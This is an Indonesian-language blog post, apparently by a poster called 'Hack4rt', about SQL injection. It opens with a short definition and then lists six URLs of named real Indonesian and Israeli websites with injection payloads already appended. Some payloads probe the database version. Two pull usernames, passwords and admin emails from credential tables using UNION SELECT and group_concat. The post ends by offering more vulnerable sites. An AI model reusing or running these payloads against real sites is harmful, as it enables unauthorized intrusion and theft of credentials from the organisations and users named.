SQL Injection - sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi
ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan
di dalam bahasa yang lain.
Nah berikut beberapa situs
yang telah Hack4rt temukan
http://www.dblindonesia.com/index.php?act=newsdetail&no=-1897%20union%20all%20select%201,@@version,3,4,5,6,7--
http://www.perbasi.or.id/index.php?ref=pengda&id=7'
http://www.bulutangkis.com/mod.php?mod=publisher&op=viewarticle&artid=-8846 union all select 1,2,3,@@version,5,6,7,8,9,10,11--
http://www.pramuka.or.id/news/news.php?intID=499'
http://www.connectionsmag.co.il/articlenav.php?id=-1163%20union%20all%20select%201,2,3,4,group_concat(username,0x3a,upassword),6,7+from+passwords--
http://www.humor.co.il/category.php?id=-61%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(apass,0x3a,email),10,11,12,13,14,15+from+admin--
Untuk yang berwarna
MERAH merupakan situs Indonesia dan berwarna
HIJAU situs Israel
Dapatkan Lebih Banyak Situs SQL Injection Vuln
Home